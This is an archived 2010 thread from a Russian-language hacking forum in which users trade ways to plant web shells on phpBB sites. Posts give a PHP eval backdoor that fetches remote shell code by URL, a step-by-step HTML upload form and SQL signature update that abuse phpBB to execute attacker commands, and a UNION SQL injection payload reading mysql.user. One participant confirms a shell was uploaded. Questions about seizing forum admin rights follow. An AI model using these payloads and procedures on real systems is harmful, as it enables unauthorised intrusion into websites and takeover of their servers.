ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.05.2010, 19:27
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
как вариант можно попробовать впихнуть код через восстановление базы данных в форуме:
eval(file_get_contents($_GET['e']));
а потом обращаться
http://site.com/images/sh.php?e=http://адресс_до_шела
З.Ы или как Ctacok посоветовал, это проще)
Последний раз редактировалось daniel_1024; 08.05.2010 в 19:58..
|
|
|
08.05.2010, 19:38
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
И как же этот код на сервер запихнуть?
|
|
|
|
08.05.2010, 19:40
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
GOGA075
с текстом тоже самое
|
|
|
|
08.05.2010, 19:46
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Ну тут 2 варианта.
Либо что то нетак сделал, либо админ сервера закрыл урлы в cmd!
|
|
|
|
08.05.2010, 19:51
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
я ни так хорошо понял версию Ctacok
куда нужно ставить эту форму аплоада ??
|
|
|
|
08.05.2010, 20:02
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Konqi попробуй через иклуид!
|
|
|
|
08.05.2010, 20:07
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
GOGA075 ты Эйнштейн. 
как можно было забыть такое!!
shell загрузилось без каких либо проблем  |
|
|
|
08.05.2010, 20:13
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от Konqi
я ни так хорошо понял версию Ctacok
куда нужно ставить эту форму аплоада ??
1. создаёшь у себя на компе 1.html
2. засовываешь туда
Код HTML:
<form action="http://your_site.ru/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=/home/z/u/zucchini/public_html/forum/images/avatars/htaccess.php
" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="upload">
</form>
3. создаёшь 1.sql
4. суёшь туда
PHP код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval($_GET[cmd])' WHERE username='USERNAME';
5. открываешь через браузер 1.html
6. выбираешь шелл
7. жмёшь upload
8. проверяешь, http://your_site.ru/forum/images/avatars/htaccess.php
так ясно? %)
|
|
|
|
08.05.2010, 20:13
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!
|
|
|
|
08.05.2010, 20:55
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858
Репутация:
33
|
|
Ребят, помогите залить шелл через двойной запрос.
Не могу залить т.к magic_quotes = on
?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+f rom+mysql.user--
выводится 2 и 8. file_priv = Y
Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2130771){kind=avatar}
Похожие темы
Линейный вид
